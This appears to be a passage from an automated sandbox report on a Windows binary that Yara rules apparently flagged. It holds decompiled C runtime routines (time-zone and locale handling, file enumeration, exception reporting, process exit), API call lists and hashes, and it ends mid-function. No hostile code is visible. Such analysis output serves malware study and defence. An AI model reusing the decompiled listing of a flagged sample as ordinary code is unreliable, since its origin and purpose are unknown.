                                                  								__eflags = _t92 - 0xffffffff;
                                                  								if(_t92 != 0xffffffff) {
                                                  									_t149 =  *0xb27db0 * 0x3c;
                                                  									_t167 =  *0xb27e04; // 0x0
                                                  									_push(_t170);
                                                  									 *0xb27da8 = 1;
                                                  									_v12 = _t149;
                                                  									__eflags =  *0xb27df6; // 0x0
                                                  									if(__eflags != 0) {
                                                  										_t150 = _t149 + _t167 * 0x3c;
                                                  										__eflags = _t150;
                                                  										_v12 = _t150;
                                                  									}
                                                  									__eflags =  *0xb27e4a; // 0x0
                                                  									if(__eflags == 0) {
                                                  										L55:
                                                  										_v16 = 0;
                                                  										_v20 = 0;
                                                  									} else {
                                                  										_t105 =  *0xb27e58; // 0x0
                                                  										__eflags = _t105;
                                                  										if(_t105 == 0) {
                                                  											goto L55;
                                                  										} else {
                                                  											_v16 = 1;
                                                  											_v20 = (_t105 - _t167) * 0x3c;
                                                  										}
                                                  									}
                                                  									_t175 = E00B0398F(0, _t167);
                                                  									_t98 = WideCharToMultiByte(_t175, 0, 0xb27db4, 0xffffffff,  *_t178, 0x3f, 0,  &_v24);
                                                  									__eflags = _t98;
                                                  									if(_t98 == 0) {
                                                  										L59:
                                                  										 *( *_t178) = 0;
                                                  									} else {
                                                  										__eflags = _v24;
                                                  										if(_v24 != 0) {
                                                  											goto L59;
                                                  										} else {
                                                  											( *_t178)[0x3f] = 0;
                                                  										}
                                                  									}
                                                  									_t101 = WideCharToMultiByte(_t175, 0, 0xb27e08, 0xffffffff, _t178[1], 0x3f, 0,  &_v24);
                                                  									__eflags = _t101;
                                                  									if(_t101 == 0) {
                                                  										L63:
                                                  										 *(_t178[1]) = 0;
                                                  									} else {
                                                  										__eflags = _v24;
                                                  										if(_v24 != 0) {
                                                  											goto L63;
                                                  										} else {
                                                  											_t178[1][0x3f] = 0;
                                                  										}
                                                  									}
                                                  								}
                                                  								 *(E00B0E007()) = _v12;
                                                  								 *((intOrPtr*)(L00B0DFFB())) = _v16;
                                                  								_t95 = E00B0E001();
                                                  								 *_t95 = _v20;
                                                  								return _t95;
                                                  							}
                                                  						}
                                                  					}
                                                  				} else {
                                                  					_t168 =  *0xb27da0; // 0x0
                                                  					_t177 = _a4;
                                                  					if(_t168 == 0) {
                                                  						L12:
                                                  						L00AF4D62(_t168);
                                                  						_t153 = _t177;
                                                  						_t12 = _t153 + 1; // 0xb0ed51
                                                  						_t169 = _t12;
                                                  						do {
                                                  							_t112 =  *_t153;
                                                  							_t153 = _t153 + 1;
                                                  						} while (_t112 != 0);
                                                  						_t13 = _t153 - _t169 + 1; // 0xb0ed52
                                                  						 *0xb27da0 = L00AF4D9C(_t153 - _t169, _t13);
                                                  						_t115 = L00AF4D62(0);
                                                  						_t166 =  *0xb27da0; // 0x0
                                                  						if(_t166 == 0) {
                                                  							goto L44;
                                                  						} else {
                                                  							_t157 = _t177;
                                                  							_push(_t170);
                                                  							_t14 = _t157 + 1; // 0xb0ed51
                                                  							_t170 = _t14;
                                                  							do {
                                                  								_t116 =  *_t157;
                                                  								_t157 = _t157 + 1;
                                                  							} while (_t116 != 0);
                                                  							_t15 = _t157 - _t170 + 1; // 0xb0ed52
                                                  							_t118 = L00AF4E44(_t166, _t15, _t177);
                                                  							_t192 = _t192 + 0xc;
                                                  							if(_t118 == 0) {
                                                  								_t170 = 3;
                                                  								_push(_t170);
                                                  								_t119 = E00B0F425(_t158,  *_t136, 0x40, _t177);
                                                  								_t192 = _t192 + 0x10;
                                                  								if(_t119 == 0) {
                                                  									while( *_t177 != 0) {
                                                  										_t177 = _t177 + 1;
                                                  										_t170 = _t170 - 1;
                                                  										if(_t170 != 0) {
                                                  											continue;
                                                  										}
                                                  										break;
                                                  									}
                                                  									_t136 =  *_t177;
                                                  									_pop(_t170);
                                                  									if(_t136 == 0x2d) {
                                                  										_t177 = _t177 + 1;
                                                  									}
                                                  									_t160 = E00AF6309(_t158, _t177) * 0xe10;
                                                  									_v8 = _t160;
                                                  									while(1) {
                                                  										_t166 =  *_t177;
                                                  										if(_t166 != 0x2b && _t166 - 0x30 > 9) {
                                                  											break;
                                                  										}
                                                  										_t177 = _t177 + 1;
                                                  									}
                                                  									__eflags = _t166 - 0x3a;
                                                  									if(_t166 == 0x3a) {
                                                  										_t177 = _t177 + 1;
                                                  										_t160 = _v8 + E00AF6309(_t160, _t177) * 0x3c;
                                                  										_v8 = _t160;
                                                  										while(1) {
                                                  											_t131 =  *_t177;
                                                  											__eflags = _t131 - 0x30;
                                                  											if(_t131 < 0x30) {
                                                  												break;
                                                  											}
                                                  											__eflags = _t131 - 0x39;
                                                  											if(_t131 <= 0x39) {
                                                  												_t177 = _t177 + 1;
                                                  												__eflags = _t177;
                                                  												continue;
                                                  											}
                                                  											break;
                                                  										}
                                                  										__eflags =  *_t177 - 0x3a;
                                                  										if( *_t177 == 0x3a) {
                                                  											_t177 = _t177 + 1;
                                                  											_t160 = _v8 + E00AF6309(_t160, _t177);
                                                  											_v8 = _t160;
                                                  											while(1) {
                                                  												_t133 =  *_t177;
                                                  												__eflags = _t133 - 0x30;
                                                  												if(_t133 < 0x30) {
                                                  													goto L37;
                                                  												}
                                                  												__eflags = _t133 - 0x39;
                                                  												if(_t133 <= 0x39) {
                                                  													_t177 = _t177 + 1;
                                                  													__eflags = _t177;
                                                  													continue;
                                                  												}
                                                  												goto L37;
                                                  											}
                                                  										}
                                                  									}
                                                  									L37:
                                                  									__eflags = _t136 - 0x2d;
                                                  									if(_t136 == 0x2d) {
                                                  										_v8 = _t160;
                                                  									}
                                                  									__eflags =  *_t177;
                                                  									_t123 = 0 |  *_t177 != 0x00000000;
                                                  									_v16 = _t123;
                                                  									__eflags = _t123;
                                                  									_t124 = _v12;
                                                  									if(_t123 == 0) {
                                                  										_t28 = _t124 + 4; // 0xfffffddd
                                                  										 *((char*)( *_t28)) = 0;
                                                  										L43:
                                                  										 *(E00B0E007()) = _v8;
                                                  										_t127 = L00B0DFFB();
                                                  										 *_t127 = _v16;
                                                  										return _t127;
                                                  									}
                                                  									_push(3);
                                                  									_t27 = _t124 + 4; // 0xfffffddd
                                                  									_t128 = E00B0F425(_t160,  *_t27, 0x40, _t177);
                                                  									_t192 = _t192 + 0x10;
                                                  									__eflags = _t128;
                                                  									if(_t128 == 0) {
                                                  										goto L43;
                                                  									}
                                                  								}
                                                  							}
                                                  							goto L45;
                                                  						}
                                                  					} else {
                                                  						_t165 = _t168;
                                                  						_t134 = _t177;
                                                  						while(1) {
                                                  							_t139 =  *_t134;
                                                  							if(_t139 !=  *_t165) {
                                                  								break;
                                                  							}
                                                  							if(_t139 == 0) {
                                                  								L8:
                                                  								_t115 = 0;
                                                  							} else {
                                                  								_t9 = _t134 + 1; // 0xdde805eb
                                                  								_t140 =  *_t9;
                                                  								if(_t140 !=  *((intOrPtr*)(_t165 + 1))) {
                                                  									break;
                                                  								} else {
                                                  									_t134 = _t134 + 2;
                                                  									_t165 = _t165 + 2;
                                                  									if(_t140 != 0) {
                                                  										continue;
                                                  									} else {
                                                  										goto L8;
                                                  									}
                                                  								}
                                                  							}
                                                  							L10:
                                                  							if(_t115 == 0) {
                                                  								L44:
                                                  								return _t115;
                                                  							} else {
                                                  								_t136 = _v12;
                                                  								goto L12;
                                                  							}
                                                  							goto L81;
                                                  						}
                                                  						asm("sbb eax, eax");
                                                  						_t115 = _t134 | 0x00000001;
                                                  						__eflags = _t115;
                                                  						goto L10;
                                                  					}
                                                  				}
                                                  				L81:
                                                  			}
                                                  0x00b0eab3
                                                  0x00000000
                                                  0x00000000
                                                  0x00b0eaaa
                                                  0x00b0eaac
                                                  0x00b0eaae
                                                  0x00b0eaae
                                                  0x00000000
                                                  0x00b0eaae
                                                  0x00000000
                                                  0x00b0eaac
                                                  0x00b0eab5
                                                  0x00b0eab8
                                                  0x00b0eaba
                                                  0x00b0eac5
                                                  0x00b0eac7
                                                  0x00b0ead1
                                                  0x00b0ead1
                                                  0x00b0ead3
                                                  0x00b0ead5
                                                  0x00000000
                                                  0x00000000
                                                  0x00b0eacc
                                                  0x00b0eace
                                                  0x00b0ead0
                                                  0x00b0ead0
                                                  0x00000000
                                                  0x00b0ead0
                                                  0x00000000
                                                  0x00b0eace
                                                  0x00b0ead1
                                                  0x00b0eab8
                                                  0x00b0ead7
                                                  0x00b0ead7
                                                  0x00b0eada
                                                  0x00b0eade
                                                  0x00b0eade
                                                  0x00b0eae3
                                                  0x00b0eae5
                                                  0x00b0eae8
                                                  0x00b0eaeb
                                                  0x00b0eaed
                                                  0x00b0eaf0
                                                  0x00b0eb08
                                                  0x00b0eb0b
                                                  0x00b0eb0e
                                                  0x00b0eb16
                                                  0x00b0eb1b
                                                  0x00b0eb20
                                                  0x00000000
                                                  0x00b0eb20
                                                  0x00b0eaf2
                                                  0x00b0eaf7
                                                  0x00b0eafa
                                                  0x00b0eaff
                                                  0x00b0eb02
                                                  0x00b0eb04
                                                  0x00000000
                                                  0x00000000
                                                  0x00b0eb06
                                                  0x00b0ea55
                                                  0x00000000
                                                  0x00b0ea3c
                                                  0x00b0e9af
                                                  0x00b0e9af
                                                  0x00b0e9b1
                                                  0x00b0e9b3
                                                  0x00b0e9b3
                                                  0x00b0e9b7
                                                  0x00000000
                                                  0x00000000
                                                  0x00b0e9bb
                                                  0x00b0e9cf
                                                  0x00b0e9cf
                                                  0x00b0e9bd
                                                  0x00b0e9bd
                                                  0x00b0e9bd
                                                  0x00b0e9c3
                                                  0x00000000
                                                  0x00b0e9c5
                                                  0x00b0e9c5
                                                  0x00b0e9c8
                                                  0x00b0e9cd
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00000000
                                                  0x00b0e9cd
                                                  0x00b0e9c3
                                                  0x00b0e9d8
                                                  0x00b0e9da
                                                  0x00b0eb27
                                                  0x00b0eb27
                                                  0x00b0e9e0
                                                  0x00b0e9e0
                                                  0x00000000
                                                  0x00b0e9e0
                                                  0x00000000
                                                  0x00b0e9da
                                                  0x00b0e9d3
                                                  0x00b0e9d5
                                                  0x00b0e9d5
                                                  0x00000000
                                                  0x00b0e9d5
                                                  0x00b0e9ad
                                                  0x00000000

                                                  APIs
                                                  • _free.LIBCMT ref: 00B0E9E4
                                                  • _free.LIBCMT ref: 00B0EA08
                                                  • _free.LIBCMT ref: 00B0EB8D
                                                  • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00B21B0C), ref: 00B0EB9F
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00B27DB4,000000FF,00000000,0000003F,00000000,?,?), ref: 00B0EC17
                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,00B27E08,000000FF,?,0000003F,00000000,?), ref: 00B0EC44
                                                  • _free.LIBCMT ref: 00B0ED59
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                  • String ID:
                                                  • API String ID: 314583886-0
                                                  • Opcode ID: 7fc1146106b11113f53292b185e5a646175d043232bae2bae40fc9caf56fc771
                                                  • Instruction ID: 4f838e94295ea0a60cf8190529355d3abe32e1d8de936c76e23555cb82697980
                                                  • Opcode Fuzzy Hash: 7fc1146106b11113f53292b185e5a646175d043232bae2bae40fc9caf56fc771
                                                  • Instruction Fuzzy Hash: 5EC12571A04209AFDB349F68CC81ABA7FE9EF45350F1449EAE4A5972D1EB30DE02C750
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: __floor_pentium4
                                                  • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                  • API String ID: 4168288129-2761157908
                                                  • Opcode ID: deb9e55e99e59a192238f1e153623326df6b8d1277e2401db3e0dbf170bac361
                                                  • Instruction ID: 684fbbe6f43663e4839a80b24859b542fc28bd00965473dd70ea59b8a41172dc
                                                  • Opcode Fuzzy Hash: deb9e55e99e59a192238f1e153623326df6b8d1277e2401db3e0dbf170bac361
                                                  • Instruction Fuzzy Hash: D0C23D71E046298FDB25CE28DD80BE9BBF5EB48344F1445EAD84DE7280E775AE818F41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00AFC713: GetLastError.KERNEL32(00000008,?,00B06979), ref: 00AFC717
                                                    • Part of subcall function 00AFC713: SetLastError.KERNEL32(00000000,00000006,000000FF), ref: 00AFC7BB
                                                  • GetACP.KERNEL32(?,?,?,?,?,?,00AF3364,?,?,?,?,?,?,00000000), ref: 00B057C6
                                                  • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00AF3364,?,?,?,?,?,?,00000000), ref: 00B057D8
                                                  • _wcschr.LIBVCRUNTIME ref: 00B05868
                                                  • _wcschr.LIBVCRUNTIME ref: 00B05876
                                                  • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,00AF3364,00000000,00AF3484), ref: 00B05919
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
                                                  • String ID:
                                                  • API String ID: 4147378913-0
                                                  • Opcode ID: 6357bd5ccda61c3472cc4e501d993f8c3f0685523e778f4db7680da10eba294e
                                                  • Instruction ID: 0c0864f0a38666c149bd324437a2a4ec5ac4a98b5442ab1055abe836d44b943c
                                                  • Opcode Fuzzy Hash: 6357bd5ccda61c3472cc4e501d993f8c3f0685523e778f4db7680da10eba294e
                                                  • Instruction Fuzzy Hash: BB71E771640B06AAEB35AB64CC45ABB7BECEF44350F1445A9FA05DB9C1EB70ED40CB60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                    • Part of subcall function 00AFC713: GetLastError.KERNEL32(00000008,?,00B06979), ref: 00AFC717
                                                    • Part of subcall function 00AFC713: SetLastError.KERNEL32(00000000,00000006,000000FF), ref: 00AFC7BB
                                                    • Part of subcall function 00AFC713: _free.LIBCMT ref: 00AFC76E
                                                    • Part of subcall function 00AFC713: _free.LIBCMT ref: 00AFC817
                                                  • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 00B06160
                                                  • IsValidCodePage.KERNEL32(00000000), ref: 00B061BB
                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 00B061CA
                                                  • GetLocaleInfoW.KERNEL32(?,00001001,00AF335D,00000040,?,00AF347D,00000055,00000000,?,?,00000055,00000000), ref: 00B06212
                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00AF33DD,00000040), ref: 00B06231
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
                                                  • String ID:
                                                  • API String ID: 949163717-0
                                                  • Opcode ID: faad368ba3f77ddeb0b9476f26febbae7a7af9328e0d87968327093a24fb89bf
                                                  • Instruction ID: 69a4612abccc46e19aa8d4e2360cd3d62a6f121052903c48e85484c832e1281d
                                                  • Opcode Fuzzy Hash: faad368ba3f77ddeb0b9476f26febbae7a7af9328e0d87968327093a24fb89bf
                                                  • Instruction Fuzzy Hash: 85516F71A0060AAFDF20DFA5CC85ABB7BF8EF08700F1445A9F915E71D1EB709A548B61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • FindFirstFileExW.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,?,00000000), ref: 00B01C53
                                                  • FindClose.KERNEL32(00000000), ref: 00B01C7A
                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 00B01CEB
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                  • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                  • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                  • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: Find$File$CloseFirstNext
                                                  • String ID:
                                                  • API String ID: 3541575487-0
                                                  • Opcode ID: b9853a7735c46ca293b27438caf69eec7dd65462f68586c842541f0861d53a6f
                                                  • Instruction ID: eb5a3938b5c3f2d3e0def863ee363496e1e75a1a65dfc7eefa8766f07652d33c
                                                  • Opcode Fuzzy Hash: b9853a7735c46ca293b27438caf69eec7dd65462f68586c842541f0861d53a6f
                                                  • Instruction Fuzzy Hash: 7841C6719001156ADB38EF6DDD89DABBBF8EB85314F4489D9F809971C1EA30DE80CA60
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 74%
                                                  			E0040446F(intOrPtr __ebx, intOrPtr __edx, intOrPtr __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                  				char _v0;
                                                  				signed int _v8;
                                                  				intOrPtr _v524;
                                                  				intOrPtr _v528;
                                                  				void* _v532;
                                                  				intOrPtr _v536;
                                                  				char _v540;
                                                  				intOrPtr _v544;
                                                  				intOrPtr _v548;
                                                  				intOrPtr _v552;
                                                  				intOrPtr _v556;
                                                  				intOrPtr _v560;
                                                  				intOrPtr _v564;
                                                  				intOrPtr _v568;
                                                  				intOrPtr _v572;
                                                  				intOrPtr _v576;
                                                  				intOrPtr _v580;
                                                  				intOrPtr _v584;
                                                  				char _v724;
                                                  				intOrPtr _v792;
                                                  				intOrPtr _v800;
                                                  				char _v804;
                                                  				struct _EXCEPTION_POINTERS _v812;
                                                  				void* __edi;
                                                  				signed int _t40;
                                                  				char* _t47;
                                                  				char* _t49;
                                                  				long _t57;
                                                  				intOrPtr _t59;
                                                  				intOrPtr _t60;
                                                  				intOrPtr _t64;
                                                  				intOrPtr _t65;
                                                  				int _t66;
                                                  				intOrPtr _t68;
                                                  				signed int _t69;
                                                  
                                                  				_t68 = __esi;
                                                  				_t64 = __edx;
                                                  				_t59 = __ebx;
                                                  				_t40 =  *0x412014; // 0x9e6834eb
                                                  				_t41 = _t40 ^ _t69;
                                                  				_v8 = _t40 ^ _t69;
                                                  				_push(_t65);
                                                  				if(_a4 != 0xffffffff) {
                                                  					_push(_a4);
                                                  					E00401E6A(_t41);
                                                  					_pop(_t60);
                                                  				}
                                                  				E00402460(_t65,  &_v804, 0, 0x50);
                                                  				E00402460(_t65,  &_v724, 0, 0x2cc);
                                                  				_v812.ExceptionRecord =  &_v804;
                                                  				_t47 =  &_v724;
                                                  				_v812.ContextRecord = _t47;
                                                  				_v548 = _t47;
                                                  				_v552 = _t60;
                                                  				_v556 = _t64;
                                                  				_v560 = _t59;
                                                  				_v564 = _t68;
                                                  				_v568 = _t65;
                                                  				_v524 = ss;
                                                  				_v536 = cs;
                                                  				_v572 = ds;
                                                  				_v576 = es;
                                                  				_v580 = fs;
                                                  				_v584 = gs;
                                                  				asm("pushfd");
                                                  				_pop( *_t22);
                                                  				_v540 = _v0;
                                                  				_t49 =  &_v0;
                                                  				_v528 = _t49;
                                                  				_v724 = 0x10001;
                                                  				_v544 =  *((intOrPtr*)(_t49 - 4));
                                                  				_v804 = _a8;
                                                  				_v800 = _a12;
                                                  				_v792 = _v0;
                                                  				_t66 = IsDebuggerPresent();
                                                  				SetUnhandledExceptionFilter(0);
                                                  				_t57 = UnhandledExceptionFilter( &_v812);
                                                  				if(_t57 == 0 && _t66 == 0 && _a4 != 0xffffffff) {
                                                  					_push(_a4);
                                                  					_t57 = E00401E6A(_t57);
                                                  				}
                                                  				E004018CC();
                                                  				return _t57;
                                                  			}

                                                  APIs
                                                  • IsDebuggerPresent.KERNEL32 ref: 00404567
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00404571
                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 0040457E
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301261564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                  • String ID:
                                                  • API String ID: 3906539128-0
                                                  • Opcode ID: 2402715568fd3a7f033aea0833c586b82d8bbb398bbe1fad897268afcc2e17dd
                                                  • Instruction ID: 1195a769eb9e4d04bd79abb1e2ff1cfbb043d98aa737aaf25acc392e7af51fe4
                                                  • Opcode Fuzzy Hash: 2402715568fd3a7f033aea0833c586b82d8bbb398bbe1fad897268afcc2e17dd
                                                  • Instruction Fuzzy Hash: 5931C674901218EBCB21DF64DD8878DB7B4BF48310F5042EAE50CA7290E7749F858F49
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00AF67CB
                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00AF67D5
                                                  • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 00AF67E2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                   • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                   • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                   • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                   • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                  • String ID:
                                                  • API String ID: 3906539128-0
                                                  • Opcode ID: 0d27242a92abc5de0c92caf215db446740dd893ab09e3ad39eb770d92e97c8fd
                                                  • Instruction ID: b1cbc688751832f9b93167f9044eae608ce1140ba0a63455effe0a7b57fcb25b
                                                  • Opcode Fuzzy Hash: 0d27242a92abc5de0c92caf215db446740dd893ab09e3ad39eb770d92e97c8fd
                                                  • Instruction Fuzzy Hash: A331C67490121DABCB21DF68DD89BDDB7B8AF08310F5041EAE81CA7250EB749F858F54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 100%
                                                   			E004035F1(int _a4) {
                                                   				void* _t14;

                                                   				// Exit path of the MSVC CRT: TerminateProcess unless E00405A93 (not shown) says
                                                   				// otherwise or the Application Verifier is attached. fs:[0x30] is the PEB,
                                                   				// PEB+0x68 is NtGlobalFlag, and bit 8 (0x100) is FLG_APPLICATION_VERIFIER.
                                                   				if(E00405A93(_t14) != 0 && ( *( *[fs:0x30] + 0x68) >> 0x00000008 & 0x00000001) == 0) {
                                                   					TerminateProcess(GetCurrentProcess(), _a4);
                                                   				}
                                                   				E00403632(_t14, _a4); // CRT pre-exit hook (not shown), then the plain ExitProcess
                                                   				ExitProcess(_a4);
                                                   			}

                                                   Line addresses (per-line address column of the listing above): 0x004035fd, 0x00403619, 0x00403619, 0x00403622, 0x0040362b

                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(00000003,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002,00000000,?,00403ECD,00000003), ref: 00403612
                                                  • TerminateProcess.KERNEL32(00000000,?,004035C7,00000003,00410EB8,0000000C,004036DA,00000003,00000002,00000000,?,00403ECD,00000003), ref: 00403619
                                                  • ExitProcess.KERNEL32 ref: 0040362B
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301261564.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                  Yara matches
                                                  Similarity
                                                  • API ID: Process$CurrentExitTerminate
                                                  • String ID:
                                                  • API String ID: 1703294689-0
                                                  • Opcode ID: 0172ae19e4532c11ae0ed1487fed2bd1e0a429119bbb2948d606f4d75f20fe07
                                                  • Instruction ID: bfe7cab4a8d0116fd485a211d40daa1066cad8d05f2417ef62f302f9e127dae3
                                                  • Opcode Fuzzy Hash: 0172ae19e4532c11ae0ed1487fed2bd1e0a429119bbb2948d606f4d75f20fe07
                                                  • Instruction Fuzzy Hash: D9E0BF31000544EBCF216FA5DD499493F69EB80346F048A35FD45AB261CB3ADD56DA58
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  APIs
                                                  • GetCurrentProcess.KERNEL32(?,?,00AD9076,?,?,?,?), ref: 00AD9099
                                                  • TerminateProcess.KERNEL32(00000000,?,00AD9076,?,?,?,?), ref: 00AD90A0
                                                  • ExitProcess.KERNEL32 ref: 00AD90B2
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                   • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                   • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                   • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                   • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID: Process$CurrentExitTerminate
                                                  • String ID:
                                                  • API String ID: 1703294689-0
                                                  • Opcode ID: 11c3bb4160e68bbc2ba2f967114705524267f9895ee86c4cfe9ab8c9ffaa6e4b
                                                  • Instruction ID: f59dc8e801f583d4937a932ecf0e8679bb0e41aeeefa818731e8da8614688aa6
                                                  • Opcode Fuzzy Hash: 11c3bb4160e68bbc2ba2f967114705524267f9895ee86c4cfe9ab8c9ffaa6e4b
                                                  • Instruction Fuzzy Hash: 70E0B631410148AFCF216F65ED1DE993B69FB45741F418415F90697631CF36DD52CA80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.301356316.0000000000AD1000.00000020.00020000.sdmp, Offset: 00AD0000, based on PE: true
                                                   • Associated: 00000000.00000002.301348929.0000000000AD0000.00000002.00020000.sdmp
                                                   • Associated: 00000000.00000002.301400311.0000000000B1B000.00000002.00020000.sdmp
                                                   • Associated: 00000000.00000002.301412690.0000000000B26000.00000004.00020000.sdmp
                                                   • Associated: 00000000.00000002.301425684.0000000000B28000.00000002.00020000.sdmp
                                                  Similarity
                                                  • API ID:
                                                  • String ID: .
                                                  • API String ID: 0-248832578
                                                  • Opcode ID: 1fb02fc737e0fc0e86348d9a872509561cde7f70dcd79521e0a60ed3b0695828
                                                  • Instruction ID: bd6055a20e68c41588d3a54bc50ffd6dbeaf98b3df0ae8e482537dd635780739
                                                  • Opcode Fuzzy Hash: 1fb02fc737e0fc0e86348d9a872509561cde7f70dcd79521e0a60ed3b0695828
                                                  • Instruction Fuzzy Hash: 0F413575900209AFDB28DEACCC95EFB7BADEF85344F1445DCF91987281E631AE418B90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  C-Code - Quality: 86%
                                                  			E0040208D(intOrPtr __edx) {
                                                  				signed int _v8;
                                                  				signed int _v12;
                                                  				signed int _v16;
                                                  				signed int _v20;
                                                  				signed char _v24;
                                                  				signed int _v28;
                                                  				signed int _v32;
                                                  				signed int _v36;
                                                  				signed int _v40;
                                                  				signed int _v44;
                                                  				signed int _v48;
                                                  				signed int _t59;
                                                  				signed int _t62;
                                                  				signed int _t63;
                                                  				intOrPtr _t65;
                                                  				signed int _t66;
                                                  				signed int _t68;
                                                  				intOrPtr _t73;
                                                  				intOrPtr* _t75;
                                                  				intOrPtr* _t77;
                                                  				intOrPtr _t84;
                                                  				intOrPtr* _t86;
                                                  				signed int _t91;
                                                  				signed int _t94;
                                                  
                                                  				_t84 = __edx;
                                                   				 *0x412b2c =  *0x412b2c & 0x00000000; // __isa_available = 0 (MSVC CRT __isa_available_init pattern)
                                                   				 *0x412030 =  *0x412030 | 1;          // __isa_enabled |= X86
                                                   				if(IsProcessorFeaturePresent(0xa) == 0) { // 0xa = PF_XMMI64_INSTRUCTIONS_AVAILABLE (SSE2)
                                                  					L20:
                                                  					return 0;
                                                  				}
